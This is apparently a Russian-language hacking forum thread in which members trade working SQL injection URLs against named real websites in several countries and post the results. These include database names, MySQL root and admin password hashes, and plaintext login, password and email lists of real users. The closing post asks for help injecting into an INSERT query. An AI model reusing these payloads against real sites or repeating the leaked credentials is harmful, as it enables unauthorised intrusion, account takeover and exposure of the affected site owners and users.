4.1.22-log admin:admin http://www.fiveavenue.ru/adm - не подходит .. (( ----------------------------------------------------- oplati.ru http://www.forum.oplati.ru/ Andy:a001e3532291b47293aebefee7616557:vfierr ----------------------------------------------------- www.norfolkadmirals.com - PR5 колонок с пассами и нечем интересным не нащёл ((
Походу ник админа- faza а id логина чет-не то. Ну например если id=20, то ник начинается на 20. http://www.faza.ru/alltop.php?cat=-1+union+select+login+from+users+where+login=20/* Но там не всё по порядку: есть 1,2,3,4,7,10,11,20 далее не копал
To bobob Лучше лимитом и сразу логин с пассом http://www.faza.ru/alltop.php?cat=-1+union+select+concat(login,0x3a,password)+from+users+limit+1,1/*
Чё вы жопу рвёте такими запросами? Вот вам faza: faza:5a4c36e900fb4d0a947751e0c59d8661 P.S. Почитайте про LIMIT
Канадские ресурсы: http://www.naturetrust.bc.ca/releases.php?id=5+and+1=2+union+select+1,concat(user(),char(58),database(),char(58),version()),3,4/* user: [email protected] database: tntsite version:4.1.21 http://www.aamc.ca/about.php?id=8+and+1=2+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables/* version : 5.0.24a-standard-log 3 tabels( ..,tbl_bestrate 3, tbl_broker 3, tbl_faq 3, tbl_kerry 3, tbl_links 3, tbl_news 3, tbl_rate 3) http://www.onmyblock.ca/media.php?id=5+and+1=2+union+select+1,2,concat(user(),char(58),database(),char(58),version()),4/* user: blockweb_block@localhost database: blockweb_admin version:4.1.22
www.70.pl Code: http://www.70.pl/main.php?id=100&ktory_kacik=-5+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,0,1,2/* 5.0.33-log:76@localhost:76 Code: http://www.70.pl/main.php?id=100&ktory_kacik=-5+union+select+1,2,3,concat_ws(0x3a,sLogin,sPassword,mail),5,6,7,8,9,10,11,12+from+70_tabUser/* На странице выводится порядка 2.676 записей данных польских юзеров вида логин:пасс:мыло admin:skurwysyn9:[email protected] karol:kupka:[email protected] karol1:droga2:[email protected] mL7:1102860011399kzm:[email protected] superopr:browar:[email protected] rkipias:dorota:[email protected] sambor.jj:290225a:[email protected] fs:42LCEHga:[email protected] slodki:7886:[email protected] drbadbrain:browar00:[email protected] ...и т.д.
Хороший буржуйский киношный сайт, пр6 Code: http://www.comingsoon.net/news/movienews.php?id=-1+union+select+concat(version(),0x3a,user(),0x3a,database())/* смотрим титл 4.1.22:comingso_nextra@csnet-cm-internal:comingso_nextra сайт про банки, пр6 Code: http://www.reusablebags.com/facts.php?id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7/* pono@localhost:4.1.22-standard-log: pono_rub И еще один буржуйский, пр5 Code: http://www.exxonsecrets.org/html/personfactsheet.php?id=-1+union+select+1,2,3,4,5,6,7,concat(user(),0x3a,version(),0x3a,database()),9,10/* greenpeace@localhost:5.0.27:greenpeace верся >5 так что работает INFORMATION_SCHEMA.TABLES
вот веселенький едушный сайт. до админки не догрыз, зато получил пасики от министерских мыльниц. если кто-нить финиширует, то дайте мне знать. http://qt.exploratorium.edu/cils/resourcelist.php?categoryID=-1+union+select+concat_ws(char(58),username,password)+from+account+limit%200,1 вот через эту штуку можно получить реквизиты. наковырял примерно это: Code: admin2:4dooney!2 richauslander:richauslander:[email protected] [email protected]:vivian (Ernie Kunze) [email protected]:11111 [email protected]:11111 уязвимы все скрипты поголовно. даже регистрация. блин. гдеж там одминка-то))
HTML: http://www.losingtoday.com/tales.php?id=999+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6/* 4.0.17-standard admin_root@localhost admin_losingt
galaxynet.com Code: http://www.galaxynet.com/default.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4/* 4.1.20:galaxynet-website:root@localhost Code: http://www.galaxynet.com/default.php?id=-1+union+select+1,concat_ws(0x3a,user,password),3,4+from+mysql.user/* Логин : MySQL(pass) : Code: root : 3a84bc4e4c3193e1 cpia.ca Code: http://www.cpia.ca/topics/default.php?ID=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16/* 4.0.27-debug-log:main_cpia_ca:[email protected] sczg.hr - Studentski Centar u Zagrebu - Sveučilište u Zagrebu Code: http://www.sczg.hr/default.php?id=kat&katID=-1/**/union/**/select/**/1,concat_ws(0x3a,version(),database(),user())/* 5.0.32-Debian_7etch1-log:sczg:root@localhost Code: http://www.sczg.hr/default.php?id=kat&katID=-1/**/union/**/select/**/1,table_name/**/from/**/information_schema.tables/**/limit/**/101,1/* Есть табы g2_User , login , db , host , user , но все они из mysql доступ к которой прикрыт
Ещё немного... NordlandTeater.no Code: http://www.nordlandteater.no/default.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* 4.1.20:norteatret:norteatret@localhost GriSoft.nl - AVG Antivirus Code: http://www.grisoft.nl/grisoft/default.php?id=10&class=&main_id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8/* 4.1.20 - WideXS:uman:[email protected] Таба users с полями username и password : Code: http://www.grisoft.nl/grisoft/default.php?id=10&class=&main_id=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8+from+users/*
Крупнейший новостной ресурс, в Мэйл топе 2 место =) незнаю что с него выжать можно даже Code: http://www.trud.ru/issue/article.php?id=-1+union+select+1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database()),7,8,9,10,11,12,13,14/* trudinfo@localhost:4.1.21-log:fox подбирал названия, ничего, базы юзверей нет... если кто что, сообщите ...
Уже третий или четвёртый раз о trud.ru пишите тему почитайте P.S. А админка тут http://www.trud.ru/adm/admin.php
Аргентина.......-Россия пять ноль http://www.riocuarto.gov.ar/area.php?are=33+and+1=2+union+all+select+1,2,3,concat(user,char(58),password),5,6,7,8,9+from+mysql.user/* Жалко нет аргентинского словарика http://www.3dgames.com.ar/hwreviews.php?Id=33+and+1=2+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(user,char(58),password,char(58)),17,18+from+mysql.user+limit+2,1/* root: (без пароля) http://www.loginstitute.ca/moreinfo.php?id=6+and+1=2+union+select+1,2,table_name,4,5,6,7+from+information_schema.tables+limit+22,1/* таблицы следующие: http://www.tgao.ca/page.php?id=9+and+1=2+union+select+1,2,table_name,4+from+information_schema.tables+limit+25,1/*
http://gubakha.ru/ru/publications/publications/?publication=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8/* 4.0.24_Debian-10sarge2-log/dbgubakha/gubakha@localhost ----------------------------------------------------------------------------- literia.ru http://literia.ru/vitrin.php?viewmode=view&id_vitrin=-1+union+select+concat_ws(0x2F,version(),database(),user()),2/* 4.1.22-standard-log/literia_portal/literia_portal@local http://literia.ru/vitrin.php?viewmode=view&id_vitrin=-1+union+select+concat_ws(0x2F,login,pwd,email),2+from+user+limit+0,1/* логин/пароль/мейл Mike/hubabuba/[email protected]
помогите советом, нашёл скуль заморочный INSERT INTO jos_gkb_voting_log (type,date,userid,fileid,ipaddress) VALUES (3,789,0,[sql],0x302e302e302e30) fileid только intger ipaddress ограничено по длине можноли в этот запрос поставить insert или update, и как если возможно
